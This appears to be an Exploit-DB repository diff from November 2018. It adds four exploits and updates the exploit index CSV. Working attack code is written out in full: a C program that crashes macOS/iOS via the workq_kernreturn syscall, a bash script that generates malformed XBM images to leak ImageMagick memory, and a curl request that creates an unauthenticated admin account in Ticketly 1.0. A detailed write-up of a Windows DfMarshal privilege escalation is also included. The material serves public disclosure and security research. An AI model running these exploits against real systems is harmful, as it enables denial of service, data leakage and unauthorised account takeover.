DB: 2018-11-21

4 changes to exploits/shellcodes

macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)

Qpopper 4.0.x - poppassd Privilege Escalation
Qpopper 4.0.x - 'poppassd' Privilege Escalation

HP-UX 11.0/11.11 - swxxx Privilege Escalation
HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation

ABRT - raceabrt Privilege Escalation(Metasploit)
ABRT - 'raceabrt' Privilege Escalation (Metasploit)
ImageMagick - Memory Leak
Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery
Kordil EDMS 2.2.60rc3 - Arbitrary File Upload
Simple E-Document 1.31 - 'username' SQL Injection
2-Plan Team 1.0.4 - Arbitrary File Upload
PHP Mass Mail 1.0 - Arbitrary File Upload
WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection
Helpdezk 1.1.1 - Arbitrary File Upload
DomainMOD 4.11.01 - Cross-Site Scripting
Kordil EDMS 2.2.60rc3 - Arbitrary File Upload
Simple E-Document 1.31 - 'username' SQL Injection
2-Plan Team 1.0.4 - Arbitrary File Upload
PHP Mass Mail 1.0 - Arbitrary File Upload
WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection
Helpdezk 1.1.1 - Arbitrary File Upload
DomainMOD 4.11.01 - Cross-Site Scripting
Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)

exploits/macos/dos/45891.c

@@ -0,0 +1,39 @@
+# Exploit Title: MacOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)
+# Date: 2018-07-30
+# Exploit Author: Fabiano Anemone
+# Vendor Homepage: https://www.apple.com/
+# Version: iOS 11.4.1 / MacOS 10.13.6
+# Tested on: iOS / MacOS
+# CVE: Not assigned
+# Tweet: https://twitter.com/anoane/status/1048549170217451520
+
+# iOS 11 / MacOS 10.13 - workq_kernreturn syscall local DoS
+# workq_kernreturn_dos.c
+# workq_kernreturn_dos
+# Created by FABIANO ANEMONE (@ on 7/30/18.
+# Copyright © 2018 FABIANO ANEMONE (fabiano.anemone@gmail.com). All rights reserved.
+# Reported to product-security@apple.com on 7/30/18
+# Fixed in Mojave.
+
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/errno.h>
+
+#define WQOPS_THREAD_WORKLOOP_RETURN 0x100    /* parks the thread after delivering the passed kevent array */
+
+int workq_kernreturn(int options, user_addr_t item, int affinity, int prio) {
+    return syscall(SYS_workq_kernreturn, options, item, affinity, prio);
+}
+
+int main(int argc, const char * argv[]) {
+    //short version that fits one tweet:
+    //syscall(368,256,1,1);
+    
+    errno = 0;
+    user_addr_t any_non_zero_address = 1;
+    int res = workq_kernreturn(WQOPS_THREAD_WORKLOOP_RETURN, any_non_zero_address, 1, 0);
+    // MacOS 10.13.X and iOS 11.X will panic at this point
+    printf("workq_kernreturn: %d - res: %d - errno: %d\n", 0, res, errno);
+    return 0;
+}

exploits/multiple/local/45890.sh

@@ -0,0 +1,32 @@
+#!/bin/bash
+
+help() {
+  echo "Usage poc generator: `basename $0` gen WIDTHxHEIGHT NAME.xbm [minimal]"
+  echo "  Example gen: `basename $0` gen 512x512 poc.xbm"
+  echo "Usage result recovery: `basename $0` recover SAVED_PREVIEW.png|jpeg|gif|etc"
+  echo "  Example recovery: `basename $0` recover avatar.png"
+}
+if [ "$1" == "-h" ]; then
+  help;
+  exit 0
+fi
+if [ "$1" == "gen" ]; then
+  echo "Generating..."
+  convert -size $2 xc:white $3
+  sed -i '0,/0x../s//0x80000001/' $3
+  if [ "$4" == "minimal" ]; then
+    echo "Shrink to minimal body size mode"
+    sed -i 's/0x00//g' $3
+    sed -i 's/,//g' $3
+    sed -i '/^\s*$/d' $3
+  fi
+  echo "Done"
+  exit 0
+fi
+if [ "$1" == "recover" ]; then
+  convert $2 temp.xbm
+  cat temp.xbm | grep -o '0x..' | xxd -r -p | strings -3
+  rm temp.xbm
+  exit 0
+fi
+help;

exploits/php/webapps/45892.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-11-19
+# Google Dork: N/A
+# Vendor: Abisoft (https://abisoftgt.net)
+# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
+# Affected Version: 1.0
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: Windows & Ubuntu
+# Tested on: Win10x64 & Kali Linux
+# CVE: N/A
+# 4. References:
+# https://hackpuntes.com/cve-2018-18922-ticketly-1-0-escalacion-de-privilegios-crear-cuenta-administrador/
+  
+# 1. Technical Description:
+# Ticketly version 1.0 are affected by a privilege escalation vulnerability,
+# an attacker could create an administrator user account by sending a POST
+# request to the resource /action/add_user.php without authentication.
+
+# 2. Proof Of Concept (PoC):
+# Send request curl:
+curl -i -s -k  -X $'POST' \
+    -H $'Host: [HOST]' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 82' \
+    --data-binary $'name=[NAME]&lastname=[LASTNAME]&email=[EMAIL]&status=1&password=[PASS]' \
+    $'http://[PATH]/action/add_user.php'

exploits/windows/local/45893.txt

@@ -0,0 +1,104 @@
+Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master)
+Platform: Windows 10 1803 (not tested earlier, although code looks similar on Win8+)
+Class: Elevation of Privilege
+
+Note, this is the master issue report for the DfMarshal unmarshaler. I’m reporting multiple, non-exhaustive, issues in this marshaler in case you decide that you want to try and “fix” it rather than blocking the marshaler outright.
+
+Summary: The unmarshaler for Storage objects is complete unsafe and yet is marked as a system trusted marshaler. There are multiple ways of abusing this to unmarshaler to get privilege escalation.
+
+Description:
+
+Storage objects are used by different parts of the OS and Office as a structured container format for sub-streams of data. You can create a new instance using APIs such as StgCreateDocFile. Being a COM object it can be marshaled around between processes, including special support during COM activation through CoGetInstanceFromIStorage. While all the important interfaces have proxy support the object also supports custom marshaling to improve performance when marshaling either INPROC or a LOCAL context. 
+
+The COM class DfMarshal CLSID:0000030b-0000-0000-c000-000000000046 (in coml2.dll on Windows 10, ole32.dll downlevel) implements the custom unmarshaling for storage objects. When marshaling the implementation generates the following output:
+
+MSHFLAGS <4 bytes>
+Object Type IID <16 bytes> - Either IID_IStream or IID_IStorage.
+Standard Marshaled Interface <Variable> - Used if the custom marshal fails.
+SDfMarshalPacket <0x70 bytes on 64 bit, 0x44 on 32 bit> - Data for the custom marshal.
+
+The SDfMarshalPacket has the following structure, note this comes from the Windows 8.1 private symbols for OLE32.DLL which are available on the public symbol server. On Windows 10 when the code was moved to COML2.DLL the private symbols didn’t move with it, however the code only seems to have had minor changes between 8.1 and 10.
+
+struct SDfMarshalPacket
+{
+  CBasedPubDocFilePtr pdf;
+  CBasedPubStreamPtr pst;
+  CBasedSeekPointerPtr psp;
+  CBasedMarshalListPtr pml;
+  CBasedDFBasisPtr pdfb;
+  CBasedGlobalContextPtr pgc;
+  CBasedGlobalFileStreamPtr fsBase;
+  CBasedGlobalFileStreamPtr fsDirty;
+  CBasedGlobalFileStreamPtr fsOriginal;
+  unsigned int ulHeapName;
+  unsigned int cntxid;
+  GUID cntxkey;
+  CPerContext *ppc;
+  HANDLE hMem;
+};
+
+The Ptr structures are native pointer sized values which are used as relative offsets into a shared memory section. The cntxid is the PID of the marshaling process, the hMem a handle to a section object which contains the shared allocation pool for use between processes. When the custom unmarshaling process starts the receiving process will try and open the process containing the shared memory handle (using cntxid and hMem) and duplicate it into the current process. Then it will map the section into memory and rebuild a local storage object based on the various relative pointers stored in the marshaled structure. Note that there is provision for performance improvements for in-process marshaling where cntxkey is a random GUID value which is known only to the process (it’s not set for cross context marshal). In that case ppc is used as a valid pointer, but ppc is always set so this leaks memory layout information to the process the object is marshaled to (not reporting this one separately). 
+
+This will only work if the process can open the marshalling process for PROCESS_DUP_HANDLE access. This restricts this to processes at the same or higher privilege, therefore an obvious target would be unmarshaling this data from a user into a system service. Fortunately there’s some protection against that, the unmarshal occurs in CSharedMemoryBlock::InitUnMarshal and looks something like the following:
+
+int CSharedMemoryBlock::InitUnMarshal(void *hMem, 
+                                      unsigned int dwProcessId, 
+                                      unsigned int culCommitSize) {
+  unsigned int dwCurrentSession;
+  unsigned int dwSourceSession;
+
+  ProcessIdToSessionId(dwProcessId, &dwSourceSession);
+  ProcessIdToSessionId(GetCurrentProcessId(), &dwCurrentSession);
+  if (dwSourceSession != dwCurrentSession)
+    return E_ACCESSDENIED;
+  HANDLE hProcess = OpenProcess(PROCESS_DUP_HANDLE, 0, dwProcessId);
+  ...
+}
+
+The code contains a check that the process containing the shared section is in the same console session as the process doing the unmarshal. If they’re not in the same session then the unmarshal process will fail. It’s unclear if this is a security check or whether it’s a reliability check, and even if it’s a security check it’s not hard to find a way around this.
+
+One thought would be to try and use this to escape a sandbox, such as AppContainer as the sandbox process and a likely COM target would all be in the same session. While there are checks for the current process being in an AppContainer (so an AC process will never use the custom unmarshaling) there are no checks for the caller being an in AC. In fact there would be as the default HYBRID custom marshaling policy should kick in and block the custom unmarshal. However as DfMarshal is marked as a system trusted marshaler, it will still execute. It turns out that it’s difficult to trivially use this from a sandbox as later in the initialization an event object is opened by name (in CDfMutex::Init) from the current session’s BaseNamedObjects directory which an AC can’t write to. However if some other process in the same session had already shared a storage object, creating the event _and_ the AC could read the randomly assigned name it could be hijacked. 
+
+So we’re back to either abusing something like UAC elevated processes/runas on the same desktop (doable but not a security boundary) or try and bypass the check to unmarshal from a user process into a system process. The key is the knowledge that the unmarshaler will open any process we tell it to, including other services in Session 0. The code could try and query the PID of the caller through COM (and thereby through MSRPC/ALPC) but it doesn’t. This means as long as we can get a writable section shared between our process and a process in session 0 we can tell the unmarshaler to look there for the section handle.
+
+After some investigation I discovered that the Audio Service will create a writable section handle for you (actually via AUDIODG) and share it back to you when you create a rendering buffer (I didn’t investigation any further). This section is large enough to copy our existing shared memory from the marshal process. We can therefore create the section, copy over the existing shared memory (or fake one from scratch) then provide the PID and handle to the system service for use in unmarshaling. We don’t have to guess the handle as the handle table from NtQuerySystemInformation reports object addresses so you just match the current process’s handle and the AUDIODG handles. When the system service unmarshals this it will now pass the session check, we also have to create a duplicate event object in the global BNO but a normal user has access to that.
+
+During the unmarshal process the implementation interacts with the shared memory as an allocation region, this is where all the issues occur. In theory if you could find a system process which actually interacts with the storage object you might find some more interesting behaviors (such as getting the system service to write to arbitrary files) but everything I’ll describe in other issues all occur during the unmarshal process and so can be used to target any system COM service using CoGetInstanceFromStorage. Basically the storage object code uses the shared memory section as if everything is running at the same level of trust and doesn’t take any real precautions against a malicious actor which has access to the same shared section or controls the existing data.
+
+As mentioned I’m reporting 4 other issues/bug classes at the same time. This is the master issue, and potentially you can mark the others as duplicates depending on how you want to fix them. Though I’d remind you that when you marked a bug as duplicate last time it didn’t get fixed so perhaps exercise caution. The four issues I’m reporting at the same time are:
+
+- DfMarshal Missing Bounds Checking Elevation of Privilege
+- DfMarshal Shared Allocator Elevation of Privilege
+- DfMarshal Arbitrary File Delete Elevation of Privilege
+- DfMarshal Handle Duplication TOCTOU Elevation of Privilege
+
+Possible fixing ideas:
+
+DO NOT just remove the class from the trusted marshaler’s list. Some COM services such as SearchIndexer runs without the EOAC_NO_CUSTOM_MARSHAL flag set.
+
+You could query the PID of the caller in the unmarshal process and only duplicate from that process, or processes in the same session as the caller. However bear in mind that when unmarshaling during activation (through CoGetInstanceFromStorage) the caller will actually be RPCSS so this might be bypassable. Depending on how you did it this might mean that a session hopping bug (which I’ve found before) would allow you to elevate privilege.
+
+You could just rewrite the whole thing, it’s an incredibly bad piece of code.
+
+You could just restrict it to a very limited set of scenarios, but again you risk bypasses due to mistakes in the checks.
+
+Proof of Concept:
+
+See the separate reports for PoCs for various issues I identified. The source for all PoCs is attached to this issue.
+
+
+After looking again at the implementation of the unmarshaler there is a check in DfUnmarshalInterface for the caller being in an AC using the IMarshalingStream::GetMarshalingContextAttribute method which ultimately tries to impersonate the caller and check if the impersonation token is an AC or not.
+
+Quick update on RS5, as this was also discovered internal to Microsoft (I believe). There has been changes to the unmarshaler in three ways:
+
+1) A check is now performed on the owner of the section from its security descriptor which must now match the current process' user.
+2) All classes now have a GUID associated with them which is verified before trusting the data from the shared section.
+3) Addition of bounds checking on structure data size.
+
+1 isn't that hard to bypass, although the PoC provided won't as it gets a section from the Audio Service which is running as LOCAL SERVICE. 2 and 3only matters for the cases where we we're trying to read out of bounds such as  issue 1645 . Microsoft will apparently be fixing RS5 as well and won't be backporting this changes verbatim to prior versions as it wouldn't be possible in some cases (such as 1 not working on Windows 7). This does look in many ways like a non-backported fix, even if it doesn't really fix much. Due to the opaqueness of MSRC it's hard to confirm or deny that they weren't going to fix down level at some point.
+
+Fixed in https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8550.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45893.zip

files_exploits.csv

@@ -6194,11 +6194,12 @@ id,file,description,date,author,type,platform,port
 45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
 45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
 45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
+45891,exploits/macos/dos/45891.c,"macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
 15,exploits/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Local Privilege Escalation",2003-04-18,"Neeko Oni",local,osx,
-21,exploits/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,local,linux,
+21,exploits/linux/local/21.c,"Qpopper 4.0.x - 'poppassd' Privilege Escalation",2003-04-29,Xpl017Elz,local,linux,
 29,exploits/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation",2003-05-12,bob,local,bsd,
 31,exploits/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Local Privilege Escalation",2003-05-14,anonymous,local,linux,
 32,exploits/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow",2003-05-21,einstein,local,windows,
@@ -6325,7 +6326,7 @@ id,file,description,date,author,type,platform,port
 470,exploits/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission",2004-09-21,"Angelo Rosiello",local,linux,
 476,exploits/linux/local/476.c,"glFTPd (Slackware 9.0/9.1/10.0) - Local Stack Overflow",2004-09-23,CoKi,local,linux,
 479,exploits/linux/local/479.c,"GNU Sharutils 4.2.1 - Local Format String",2004-09-25,n4rk0tix,local,linux,
-482,exploits/hp-ux/local/482.c,"HP-UX 11.0/11.11 - swxxx Privilege Escalation",2002-12-11,watercloud,local,hp-ux,
+482,exploits/hp-ux/local/482.c,"HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation",2002-12-11,watercloud,local,hp-ux,
 558,exploits/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,local,windows,
 559,exploits/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,local,windows,
 560,exploits/windows/local/560.txt,"GlobalScape - CuteFTP macros '.mcr' Local File Write",2004-09-28,ATmaCA,local,windows,
@@ -9675,7 +9676,7 @@ id,file,description,date,author,type,platform,port
 44063,exploits/windows/local/44063.md,"Nitro Pro PDF - Multiple Vulnerabilities",2017-07-24,SecuriTeam,local,windows,
 44064,exploits/linux/local/44064.md,"Odoo CRM 10.0 - Code Execution",2017-06-30,SecuriTeam,local,linux,
 44066,exploits/windows/local/44066.md,"Dashlane - DLL Hijacking",2017-08-03,SecuriTeam,local,windows,
-44097,exploits/linux/local/44097.rb,"ABRT - raceabrt Privilege Escalation(Metasploit)",2018-02-16,Metasploit,local,linux,
+44097,exploits/linux/local/44097.rb,"ABRT - 'raceabrt' Privilege Escalation (Metasploit)",2018-02-16,Metasploit,local,linux,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -10113,6 +10114,8 @@ id,file,description,date,author,type,platform,port
 45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
 45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
 45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
+45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
+45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -38619,7 +38622,7 @@ id,file,description,date,author,type,platform,port
 41551,exploits/php/webapps/41551.txt,"Audiojungle Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,
 41552,exploits/php/webapps/41552.txt,"Videohive Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,
 41553,exploits/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,
-41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,
+41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80
 41556,exploits/php/webapps/41556.txt,"Country on Sale Script - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,
 41557,exploits/php/webapps/41557.txt,"Media Search Engine Script - 'search' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,
 41558,exploits/php/webapps/41558.txt,"Soundify 1.1 - 'tid' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,
@@ -40384,11 +40387,12 @@ id,file,description,date,author,type,platform,port
 45864,exploits/php/webapps/45864.txt,"Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
 45868,exploits/php/webapps/45868.txt,"EverSync 0.5 - Arbitrary File Download",2018-11-15,"Ihsan Sencan",webapps,php,80
 45875,exploits/php/webapps/45875.txt,"Meneame English Pligg 5.8 - 'search' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
-45876,exploits/php/webapps/45876.txt,"Kordil EDMS 2.2.60rc3 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
-45877,exploits/php/webapps/45877.txt,"Simple E-Document 1.31 - 'username' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,
-45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
-45879,exploits/php/webapps/45879.txt,"PHP Mass Mail 1.0 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
-45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,
-45881,exploits/php/webapps/45881.txt,"Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection",2018-11-16,"Ihsan Sencan",webapps,php,
-45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,
-45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,
+45876,exploits/php/webapps/45876.txt,"Kordil EDMS 2.2.60rc3 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,80
+45877,exploits/php/webapps/45877.txt,"Simple E-Document 1.31 - 'username' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
+45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,80
+45879,exploits/php/webapps/45879.txt,"PHP Mass Mail 1.0 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,80
+45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,80
+45881,exploits/php/webapps/45881.txt,"Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection",2018-11-16,"Ihsan Sencan",webapps,php,80
+45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80
+45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,80
+45892,exploits/php/webapps/45892.txt,"Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-20,"Javier Olmedo",webapps,php,80